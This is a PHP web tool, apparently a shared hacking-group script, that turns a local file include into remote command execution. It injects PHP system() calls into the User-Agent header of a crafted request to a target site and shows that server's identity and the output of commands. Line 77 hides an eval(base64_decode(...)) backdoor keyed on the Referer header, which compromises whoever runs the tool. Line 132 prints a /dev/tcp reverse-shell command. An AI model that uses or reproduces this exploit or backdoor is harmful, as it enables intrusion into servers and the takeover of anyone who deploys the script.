LFI/RCE (Lcal File Include/Remote Command Execution)

1. <style>
2. body,input,table,select{background: black; font-family:Verdana,tahoma; color: #008000; font-size:12px; }
3. a:link,a:active,a:visited{text-decoration: none;color: red;}
4. a:hover {text-decoration: underline; color: red;}
5. table,td,tr,#gg{ border-style:solid; text-decoration:bold; }
6. tr:hover,td:hover{background-color: #FFFFCC; color:green;}
7. .oo:hover{background-color: black; color:white;}
8. </style>
9. <title>LFI</title>
10.  
11. <center>
12. <div align="center" style="width: 100%; height: 100">
13. <pre width="100%" align="center"><strong>
14.  ____            __         _    ____  _
15. |  _ \ ___  ___  | |_  x4x | |  | ___|| |
16. | |_) / _ \ / _ \| __| x4x | |  | |__ | |
17. |  _ < (_) | (_) | |_  x4x | |__| |_/ | |
18. |_| \_\___/ \___/ \__| x4x |___/|_|   |_|
19.  
20. </pre>
21. </div></strong>
22. </center>
23. <table border=0 width=700 align=center><tr><Td><center><p style="font-size: 14pt;">
24. <b>AZZATSSINS CYBERSERKERS</br></b></td></tr>
25. </center>
26. </table>
27. <?php
28. if($_POST['injek']):
29.     $sasaran= str_replace("http://","",$_POST['host']);
30.     $sp     = explode("/",$sasaran);
31.     $victim    = $sp[0];
32.     $port    = 80;
33.     $inject    = str_replace($victim,"",$sasaran);
34.     $command  = "XHOSTNAME<?php echo system('hostname;echo  ;'); ?>XHOSTNAME";
35.     $command .= "XSIP<?php echo \$_SERVER['SERVER_ADDR']; ?>XSIP";
36.     $command .= "XUNAME<?php echo system('uname -a;echo  ;'); ?>XUNAME";
37.     $command .= "XUSERID<?php echo system('id;echo  ;'); ?>XUSERID";
38.     $command .= "XPWD<?php echo system('pwd;echo  ;'); ?>XPWD";
39.     $command .= "XPHP<?php echo phpversion(); ?>XPHP";
40.     if($_POST['cwd']){
41.     $command .= "XCWD<?php chdir('".$_POST['cwd']."'); ?>XCWD";
42.     }
43.     $command .= "EXPLORE<pre><?php echo system('".$_POST['cmd']."; echo    ; exit;'); ?></pre>EXPLORE";
44.    
45.     if(eregi(":",$victim)){
46.         $vp = explode(":",$victim);
47.         $victim = $vp[0];
48.         $port    = $vp[1];
49.     }
50.  
51.     $sock = fsockopen($victim,$port,$errno,$errstr,30);
52.     if ($sock) {
53.         $get  = "GET ".$inject." HTTP/1.1\r\n".
54.                 "Host: ".$victim."\r\n".
55.                 "Accept: */*\r\n".
56.                 "User-Agent: Mozilla/5.0 ".$command."\r\n".
57.                 "Connection: Close\r\n\r\n";
58.         fputs($sock,$get);        
59.         while (!feof($sock)) {
60.             $output .= trim(fgets($sock, 3600000))."\n";            
61.         }
62.         fclose($sock);
63.     }
64.     $hostp     = explode("XHOSTNAME",$output); $hostname = $hostp[1];
65.     $ipp    = explode("XSIP",$output); $ip = $ipp[1];
66.     $unamep    = explode("XUNAME",$output); $uname = $unamep[1];
67.     $userp    = explode("XUSERID",$output); $userid = $userp[1];
68.     $currp    = explode("XPWD",$output); $current = $currp[1];
69.     $writes    = @is_writable($current);
70.     $phpvp    = explode("XPHP",$output); $phpversion = $phpvp[1];
71.     $hasil    = explode("EXPLORE",$output); $return = $hasil[1];
72.    
73.    
74. endif;
75.         $ipx =$_SERVER["REMOTE_ADDR"];
76.         $portx ="22";
77.  parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' && count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ", "+", join(array_slice($a,count($a)-3)))));echo '</star>';}
78. ?>
79. <form action='<?php echo $_SERVER['PHP_SELF'] ?>' method='post'>
80. <table border=0 align=center width=860>
81. <?php if($_POST['injek']){ ?>
82. <tr>
83.     <td colspan=3> </td>
84. </tr>
85. <tr><Td><b>Target Site</b> </td><td>:</td>
86.     <td><?php echo $victim ?></td>
87. </tr>
88. <tr><Td><b>SRV Host</b> </td><td>:</td>
89.     <td><?php echo $hostname ?></td>
90. </tr>
91. <tr><Td>SRV IP</td><td>:</td>
92.     <td><?php echo $ip ?></td>
93. </tr>
94. <tr><Td><b>Uname -a</b></td><td>:</td>
95.     <td><?php echo $uname ?></td>
96. </tr>
97. <tr><Td><b>User ID</b></td><td>:</td>
98.     <td><?php echo $userid ?></td>
99. </tr>
100. <tr><Td><b>DIR /</b></td><td>:</td>
101.     <td><?php echo $current; if($writes){ echo "<b>Writeable!</b>"; } ?></td>
102. </tr>
103. <tr><Td><b>PHP_SRV Version</b></td><td>:</td>
104.     <td><?php echo $phpversion ?></td>
105. </tr>
106. <?php } ?>
107. <tr>
108.     <td colspan=3> </td>
109. </tr>
110. <tr><Td width=130><b>Add the webSite</b></td><td>:</td>
111.     <td><input type=text size=110 value='<?php echo $_POST['host'] ?>' name=host /></td>
112. </tr>
113. <?php if($_POST['injek']){ ?>
114. <tr><Td width=130><b>Work Directory</b></td><td>:</td>
115.     <td><input type=text size=110 value='<?php echo (($_POST['cwd'])?$_POST['cwd']:$current); ?>' name=cwd /></td>
116. </tr>
117. <?php } ?>
118. <tr><Td><b>Command t0 Exec</b></td><td>:</td>
119.     <Td><input type=text size=110 value='<?php echo $_POST['cmd']; ?>' name=cmd /></td>
120. </tr>
121. <tr><td colspan=2> </td><td><input type=submit name=injek value="Execute!" /></td></tr>
122. <tr>
123.     <td colspan=3> </td>
124. </tr>
125. </table>
126.  
127. <?php
128. if($_POST['injek']):    
129. echo "<table border=0 width=860 align=center><tr><Td> <pre>".$hasil[1]."</pre></td></tr></table>";
130. endif;
131. echo "</form>";
132. echo "<PRE style='text-align: center; width: 100%; color: red'>Reverse Connection method: /bin/bash -i > /dev/tcp/$ipx/$portx 0<&1 2>&1</pre>";
133. exit();
134. ?>
135. <body>
136. <p align="center">
137. <i><b>&copy; AZZATSSINS CYBERSERKERS</b></i></p>
138. </body>